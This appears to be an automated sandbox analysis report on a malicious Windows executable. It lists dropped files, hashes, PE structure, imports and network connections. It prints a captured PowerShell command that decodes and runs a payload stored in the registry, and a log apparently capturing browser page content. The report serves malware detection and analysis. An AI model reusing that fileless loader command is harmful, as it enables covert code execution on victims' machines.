SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fxEp7LGzxs7+AEszIWXp+N23fxEpD:p37Lvkmb6KH5EpOWZE85EpDn
MD5:	AEDA637F0B93910DDA9DCB41585D1FBF
SHA1:	7D528268F83393309FBB4DCB105B11C7EBD1826D
SHA-256:	20B32FC56CB870C6CDCBF8D753CB42C34D07801D392189238740EA42FC9A17A3
SHA-512:	22F717BF7766EB7E3986521BBBB63CAD78047D56AF9D5AC7148418B78F37E4E1E2ED70BBEBF121730D251C47E24B8A2D06CB7C5C9F2456B687E0CEE768936B9E
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\i1aaekli.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\i1aaekli.0.cs"

C:\Users\user\AppData\Local\Temp\i1aaekli.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6242156235464043
Encrypted:	false
SSDEEP:	24:etGS68+mUE7R85lwCk3tQJ3pPo3864OFtkZfpuDZ0WI+ycuZhNhakSvPNnq:60XE7S5lwhe8jwJpYZX1ulha3tq
MD5:	FF28D58E52C9B08A0B91C34FE6CB8086
SHA1:	EC7E91AEB56249664477F8A1A88261329C987F57
SHA-256:	40D2156C7127E729396659AB33BF3F105EFD7BEF135E9C680E4FBF79AE427E23
SHA-512:	BDBEF6188AB09F806D0C41DC578AC17D5531015C757D5E4752CDA2F3C771B04FE8D7B9E9C2DC8FC84EB31201832C6B8CAAF6938451F84FBBB551BAE59EFEC24C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1................(...................................... 8............ E............ X.....P ......c.........i.....p.....z.....................c. ...c...!.c.%...c.......*.....3.;.....8.......E.......X...........

C:\Users\user\AppData\Local\Temp\i1aaekli.out Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	848
Entropy (8bit):	5.3131522141031855
Encrypted:	false
SSDEEP:	24:AId3ka6KH4PE84iKaM5DqBVKVrdFAMBJTH:Akka6AIE8HKxDcVKdBJj
MD5:	0E1AD61E45113253E5CFE1E18A0F35EC
SHA1:	FC96533B42CBEE7B23340B5CB6C45CA6EB3AA576
SHA-256:	1230246ED71C46FE8AEADE013E8D857EBD022689CA611DDFC7EE5847868F1981
SHA-512:	0BC9F6E5317EAEB26EC7F1F37CF82552F6C78FE40F2D1622E6AA0215D24E2657A63D9D4EC8C956E3F3F59905C44B11A2D3BB4FB9434B2BAEC0BC207F87D5811C
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\i1aaekli.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\i1aaekli.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\Microsoft\MarkClass Download File
Process:	C:\Windows\explorer.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	10859
Entropy (8bit):	4.446683388718207
Encrypted:	false
SSDEEP:	96:FYnnnAJppp222222MXXC3ZlMB4+j+PDdEyRPdrkUUxeXAyNY90ZDCmmmm88888Yh:9FlQyNQ0Z6wwwwOOOO5
MD5:	ED7ED76ADB16092B594B8CF3433DA64C
SHA1:	BD28A1BBAB4EDB61E3E6E6C1A7AF25C0511DFC9A
SHA-256:	89113B138596A9A8DDF4DCF524FC60FC1D0855E67B3859FECBA1360F42190EBD
SHA-512:	759673DAF16A071F025179FC4A67CED8DE93E1E0B0842A3E73E0FBE33A146DBBF61E8194AA0E1F91968FB2478CE5F654EF4C9D513B98B23E8BE1E726F6E56964
Malicious:	false
Preview:	23-11-2021 21:01:39 \| "<!DOCTYPE HTML>" \| 1..23-11-2021 21:01:39 \| "<HTML ID" \| 1..23-11-2021 21:01:39 \| "<HEAD>" \| 1..23-11-2021 21:01:40 \| "<META CHARSET" \| 1..23-11-2021 21:01:40 \| "<META NAME" \| 1..23-11-2021 21:01:40 \| "<META NAME" \| 1..23-11-2021 21:01:40 \| "<META NAME" \| 1..23-11-2021 21:01:42 \| "<TITLE>YAHOO</TITLE>" \| 1..23-11-2021 21:01:42 \| "<META NAME" \| 1..23-11-2021 21:01:43 \| "<LINK REL" \| 1..23-11-2021 21:01:43 \| "<LINK REL" \| 1..23-11-2021 21:01:43 \| "<LINK REL" \| 1..23-11-2021 21:01:44 \| "<LINK REL" \| 1..23-11-2021 21:01:44 \| "<LINK REL" \| 1..23-11-2021 21:01:44 \| "<LINK REL" \| 1..23-11-2021 21:01:44 \| "<LINK REL" \| 1..23-11-2021 21:01:44 \| "<LINK REL" \| 1..23-11-2021 21:01:44 \| "<LINK REL" \| 1..23-11-2021 21:01:45 \| "<META NAME" \| 1..23-11-2021 21:01:45 \| "<LINK REL" \| 1..23-11-2021 21:01:45 \| "<LINK REL" \| 1..23-11-2021 21:01:45 \| "<STYLE NONCE" \| 1..23-11-2021 21:01:46 \| "#MBR-CSS-CHECK {" \| 1..23-11-2021 21:01:46 \| "DISPLAY: INLINE;" \| 1..23-11-2021 21:01:46 \| "}"

C:\Users\user\Documents\20211123\PowerShell_transcript.721680.W01rE_5a.20211123205931.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	5.325011715072354
Encrypted:	false
SSDEEP:	24:BxSAaxvBnRKx2DOXUWOLCHGI4qWPtHjeTKKjX4CIym1ZJX0OLCHGI4jGnxSAZLi:BZGvhQoORF4tPtqDYB1Z2F4cZZe
MD5:	64DCF29EFCD6A6F38728361169A5ED63
SHA1:	A5C6CB281423AE7E55D2DF225B55D5C8AFC5B01D
SHA-256:	CFC03A12FEF125CACE17B18C13EA4F53D578E9D05BF5CCCC67ADCF439FEA9A53
SHA-512:	E3FA3070041740AF06107B731596E629A17B96556943C13DA589BC3BDF0A9C6A4849BB089600027DBB4A52A1DF0E4EA3813FE385E615E0AF4340934C9633D213
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20211123205937..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 721680 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 4856..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20211123205937..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..******************

\Device\ConDrv Download File
Process:	C:\Windows\System32\nslookup.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	28
Entropy (8bit):	4.039148671903071
Encrypted:	false
SSDEEP:	3:U+6QlBxAN:U+7BW
MD5:	D796BA3AE0C072AA0E189083C7E8C308
SHA1:	ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
SHA-256:	EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
SHA-512:	BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
Malicious:	false
Preview:	Non-authoritative answer:...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.870124121679364
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FpYf5EGDO9.exe
File size:	299520
MD5:	2f1743897afa6f586ae97f53bf55c14e
SHA1:	21a51f4a3fa0c65509a1c7ef640f7e6b779aee49
SHA256:	440c297bcaa0e4ca3d84281d524b8351ad1ea2b5aabb22795db824a356cd54bd
SHA512:	162fb9b7e4e18c7a6a3acfa24c284f23602337810e6de5126895673f481706ddeb09454737326bc6e5a834f1404ea48b8d6c0b0c3c199a4ea3c29c608450a667
SSDEEP:	6144:W8wgMcxaKnK1JVhXzHw9SXuZet0ySeznAySUQBs97Tp:W8hMszaPhDQ9SXuZet0ySezaUQB+/p
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0..#t..pt..pt..p..Up]..p..`pe..p..Tp...p}.mp...pt..pu..p..Qpu..p..dpu..p..cpu..pRicht..p........PE..L..."..`...................

File Icon


Icon Hash:	a2e8e8e8a2a2a488

Static PE Info

General
Entrypoint:	0x418140
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x60AFB322 [Thu May 27 14:56:34 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	6f82efd43bd3095537b2fbbd588fd6ad

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F0694A54F5Bh
call 00007F0694A54C66h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0042FEC0h
push 0041C360h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF98h
push ebx
push esi
push edi
mov eax, dword ptr [00432064h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00401358h]
cmp dword ptr [01FB5ABCh], 00000000h
jne 00007F0694A54C60h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
call dword ptr [00401354h]
call 00007F0694A54DE3h
mov dword ptr [ebp-6Ch], eax
call 00007F0694A58DABh
test eax, eax
jne 00007F0694A54C5Ch
push 0000001Ch
call 00007F0694A54DA0h
add esp, 04h
call 00007F0694A58708h
test eax, eax
jne 00007F0694A54C5Ch
push 00000010h
call 00007F0694A54D8Dh
add esp, 04h
push 00000001h
call 00007F0694A58653h
add esp, 04h
call 00007F0694A5630Bh
mov dword ptr [ebp-04h], 00000000h
call 00007F0694A55EEFh
test eax, eax

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x304a4	0x78	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1bb7000	0x5470	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1bbd000	0x17e4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1440	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x17f70	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x3f8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x30cf6	0x30e00	False	0.609994405371	data	7.04723316599	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x32000	0x1b84ac0	0x1400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1bb7000	0x5470	0x5600	False	0.609511264535	data	5.96212400018	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1bbd000	0x1155c	0x11600	False	0.0751039793165	data	0.975523484519	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
YONAMIKORUFENI	0x1bba700	0xee8	ASCII text, with very long lines, with no line terminators	Spanish	Paraguay
RT_CURSOR	0x1bbb5e8	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Divehi; Dhivehi; Maldivian	Maldives
RT_ICON	0x1bb7330	0x8a8	data	Spanish	Paraguay
RT_ICON	0x1bb7bd8	0x6c8	data	Spanish	Paraguay
RT_ICON	0x1bb82a0	0x568	GLS_BINARY_LSB_FIRST	Spanish	Paraguay
RT_ICON	0x1bb8808	0x10a8	data	Spanish	Paraguay
RT_ICON	0x1bb98b0	0x988	data	Spanish	Paraguay
RT_ICON	0x1bba238	0x468	GLS_BINARY_LSB_FIRST	Spanish	Paraguay
RT_STRING	0x1bbbea8	0xfc	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x1bbbfa8	0x26c	data	Divehi; Dhivehi; Maldivian	Maldives
RT_STRING	0x1bbc218	0x254	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_CURSOR	0x1bbbe90	0x14	data	Divehi; Dhivehi; Maldivian	Maldives
RT_GROUP_ICON	0x1bba6a0	0x5a	data	Spanish	Paraguay

Imports

DLL	Import
KERNEL32.dll	GetNumaNodeProcessorMask, SetCriticalSectionSpinCount, SearchPathW, SetInformationJobObject, lstrcmpA, FindFirstFileW, SetThreadContext, EnumCalendarInfoA, WriteConsoleInputW, IsBadStringPtrW, lstrlenA, EnumDateFormatsExW, CopyFileExW, GetNumaProcessorNode, TlsGetValue, SetLocalTime, UnmapViewOfFile, MoveFileExA, CommConfigDialogA, GetNumberOfConsoleInputEvents, GetConsoleAliasExesLengthA, SetErrorMode, FindResourceW, BuildCommDCBAndTimeoutsA, FreeLibrary, DeleteVolumeMountPointA, SetUnhandledExceptionFilter, LoadLibraryExW, SetDllDirectoryW, InterlockedIncrement, GetQueuedCompletionStatus, VerSetConditionMask, MoveFileExW, ReadConsoleA, InterlockedDecrement, WaitNamedPipeA, SetMailslotInfo, SetConsoleActiveScreenBuffer, WritePrivateProfileSectionA, SetDefaultCommConfigW, SetEnvironmentVariableW, CreateJobObjectW, SignalObjectAndWait, AddConsoleAliasW, GetComputerNameW, SetEvent, SetThreadExecutionState, OpenSemaphoreA, CreateHardLinkA, GetFileAttributesExA, _lclose, GetModuleHandleW, GetTickCount, GetCommConfig, GetProcessHeap, IsBadReadPtr, GetConsoleAliasesLengthA, GetSystemTimeAsFileTime, GetPrivateProfileStringW, GetConsoleTitleA, CreateRemoteThread, GetCompressedFileSizeW, EnumTimeFormatsA, SetCommTimeouts, CreateActCtxW, InitializeCriticalSection, GetProcessTimes, TlsSetValue, AllocateUserPhysicalPages, OpenProcess, FindResourceExA, GlobalAlloc, GetPrivateProfileIntA, LoadLibraryW, GetConsoleMode, FatalAppExitW, GetThreadSelectorEntry, AssignProcessToJobObject, GetCalendarInfoA, ReadFileScatter, SetSystemTimeAdjustment, SetVolumeMountPointA, ReadConsoleOutputW, SetConsoleCP, InterlockedPopEntrySList, LeaveCriticalSection, GetFileAttributesA, GlobalFlags, lstrcpynW, GetNamedPipeInfo, HeapValidate, GetVolumePathNamesForVolumeNameW, CreateSemaphoreA, SetConsoleCursorPosition, VerifyVersionInfoA, HeapQueryInformation, WritePrivateProfileSectionW, TerminateProcess, GetAtomNameW, FileTimeToSystemTime, UnregisterWait, lstrcatA, GetBinaryTypeW, CompareStringW, ExitThread, GetVolumePathNameA, lstrlenW, SetConsoleTitleA, WritePrivateProfileStringW, GlobalUnlock, VirtualUnlock, GetTempPathW, GetStringTypeExA, GetNamedPipeHandleStateW, GetLargestConsoleWindowSize, GetPrivateProfileIntW, InterlockedExchange, ReleaseActCtx, SetCurrentDirectoryA, GetStdHandle, FindFirstFileA, GetLastError, ChangeTimerQueueTimer, BackupRead, BindIoCompletionCallback, GetProcAddress, FindVolumeMountPointClose, GetLongPathNameA, VirtualAlloc, HeapSize, SetFirmwareEnvironmentVariableW, CreateNamedPipeA, CreateJobSet, LocalLock, LockFileEx, VerLanguageNameW, BuildCommDCBW, DefineDosDeviceA, FindClose, GetPrivateProfileStringA, LoadLibraryA, Process32FirstW, OpenMutexA, ProcessIdToSessionId, MoveFileA, GetExitCodeThread, GetNumberFormatW, SetFileApisToANSI, QueryDosDeviceW, SetConsoleWindowInfo, SetThreadIdealProcessor, HeapWalk, GetPrivateProfileStructA, GetTapeParameters, GetVolumePathNamesForVolumeNameA, GetModuleFileNameA, GetDefaultCommConfigA, FindNextFileA, WriteProfileStringA, WTSGetActiveConsoleSessionId, EnumDateFormatsA, WaitCommEvent, _lread, FindFirstChangeNotificationA, GetProcessShutdownParameters, QueueUserWorkItem, ContinueDebugEvent, IsDebuggerPresent, GetProcessAffinityMask, FatalExit, FreeEnvironmentStringsW, EnumResourceNamesA, WriteProfileStringW, EnumDateFormatsW, FatalAppExitA, PeekConsoleInputA, DeleteCriticalSection, WriteConsoleOutputAttribute, OutputDebugStringA, GetCPInfoExA, DuplicateHandle, FindFirstVolumeA, GetVersionExA, ReadConsoleInputW, TlsAlloc, TerminateJobObject, CloseHandle, GetVersion, DeleteTimerQueueTimer, GlobalAddAtomW, SetFileValidData, FindActCtxSectionStringW, ResetWriteWatch, UnregisterWaitEx, ReadConsoleOutputCharacterW, TlsFree, GetProfileSectionW, EnumSystemLocalesW, lstrcpyW, CreateFileW, SetStdHandle, GetPrivateProfileSectionNamesW, EnumResourceNamesW, GetThreadContext, GetModuleFileNameW, GetFullPathNameA, RaiseException, GetCommandLineW, HeapSetInformation, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetCurrentProcessId, DecodePointer, ExitProcess, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, EncodePointer, SetLastError, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, EnterCriticalSection, GetCurrentProcess, UnhandledExceptionFilter, HeapAlloc, HeapReAlloc, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, WriteConsoleW, OutputDebugStringW, IsProcessorFeaturePresent, SetFilePointer, GetConsoleCP, FlushFileBuffers
USER32.dll	GetMessageTime
GDI32.dll	GetBitmapBits
ADVAPI32.dll	InitiateSystemShutdownA, GetFileSecurityW
MSIMG32.dll	AlphaBlend

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Paraguay
Divehi; Dhivehi; Maldivian	Maldives

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2021 20:59:01.188534021 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.188596010 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.188694954 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.223388910 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.223433971 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.455176115 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.455302000 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.838922024 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.838963985 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.839232922 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.839298010 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.843496084 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.884892941 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.957516909 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.957607985 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:01.957634926 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.957654953 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:01.957710028 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:02.087204933 CET	49747	443	192.168.2.3	74.6.143.26
Nov 23, 2021 20:59:02.087254047 CET	443	49747	74.6.143.26	192.168.2.3
Nov 23, 2021 20:59:02.118227959 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.118277073 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.118367910 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.119088888 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.119108915 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.203983068 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.204166889 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.214313984 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.214344025 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.214649916 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.215068102 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.215991974 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.260881901 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.409250975 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.409365892 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.409385920 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.409440994 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.409447908 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:02.409502029 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.411650896 CET	49748	443	192.168.2.3	87.248.100.216
Nov 23, 2021 20:59:02.411673069 CET	443	49748	87.248.100.216	192.168.2.3
Nov 23, 2021 20:59:22.621581078 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.621613026 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.621711969 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.622286081 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.622297049 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.772825003 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.772947073 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.856421947 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.856455088 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.856741905 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.857845068 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.879123926 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.924865961 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.993434906 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.993472099 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.993495941 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.993606091 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.993624926 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.993719101 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.993722916 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.994304895 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.994342089 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.994436026 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:22.994445086 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:22.994494915 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.037786961 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.037815094 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.037983894 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.038005114 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.038053036 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.038547993 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.038567066 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.038649082 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.038657904 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.038696051 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.039382935 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.039403915 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.039828062 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.039836884 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.039922953 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.082202911 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.082228899 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.082324028 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.082344055 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.082391977 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.082488060 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.083184004 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.083205938 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.083281040 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.083292007 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.083317995 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.083340883 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.083847046 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.083867073 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.083940029 CET	49751	443	192.168.2.3	89.44.9.140
